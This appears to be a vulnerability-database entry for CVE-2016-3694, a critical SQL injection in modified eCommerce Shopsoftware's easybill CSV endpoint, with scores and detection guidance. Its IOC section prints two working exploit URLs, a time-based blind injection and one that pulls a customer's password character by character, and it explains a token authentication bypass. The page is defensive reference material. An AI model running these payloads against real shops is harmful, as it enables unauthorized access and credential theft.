CVE-2016-3694
published 2017-02-15CVE-2016-3694: Multiple SQL injection vulnerabilities in modified eCommerce Shopsoftware 2.0.0.0 revision 9678, when the easybill-module is not installed, allow remote…
PriorityP269critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
3.73%
88.5th percentile
Multiple SQL injection vulnerabilities in modified eCommerce Shopsoftware 2.0.0.0 revision 9678, when the easybill-module is not installed, allow remote attackers to execute arbitrary SQL commands via the (1) orders_status or (2) customers_status parameter to api/easybill/easybillcsv.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| modified | ecommerce_shopsoftware | — | — |
Detection & IOCsextracted from sources · hover to see the quote
urlhttp://127.0.0.1/shop/api/easybill/easybillcsv.php?token=MODULE_EASYBILL_CSV_CRON_TOKEN&orders_status=-111'))or-sleep(5)/*&customers_status=*/%23↗
urlhttp://127.0.0.1/shop/api/easybill/easybillcsv.php?token=MODULE_EASYBILL_CSV_CRON_TOKEN&orders_status=-111'))or(Select(case(36)when(ascii(substring(`customers_password`FROM(1)FOR(1))))then-sleep(5)End)from`customers`where`customers_id`=1)/*&customers_status=*/%23↗
- →Detect unauthenticated GET requests to /api/easybill/easybillcsv.php with the literal token value 'MODULE_EASYBILL_CSV_CRON_TOKEN', which bypasses authentication when the easybill module is not installed. ↗
- →Monitor GET requests to easybillcsv.php for SQL injection payloads in the 'orders_status' or 'customers_status' parameters, particularly patterns containing time-based blind injection keywords such as 'sleep' or 'case/when/ascii/substring' with whitespace stripped and commas replaced. ↗
- →Flag requests where 'orders_status' contains patterns like '))or-sleep(' or '))or(Select(case(' as indicators of time-based blind SQL injection exploitation attempts against this endpoint. ↗
- →The injection technique avoids whitespace and commas; detection rules should look for SQL keywords concatenated without spaces (e.g., 'FROM(1)FOR(1)', 'ascii(substring(') in query parameters as a bypass indicator. ↗
- ·The authentication bypass (using the literal string 'MODULE_EASYBILL_CSV_CRON_TOKEN' as the token value) only works when the easybill module is NOT installed. If the module is installed, the constant is defined and the bypass is ineffective. ↗
- ·Union-based SQL injection is not possible due to the ORDER BY clause with explicit table references; exploitation is limited to blind (time-based) injection techniques. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
2017-02-15
Published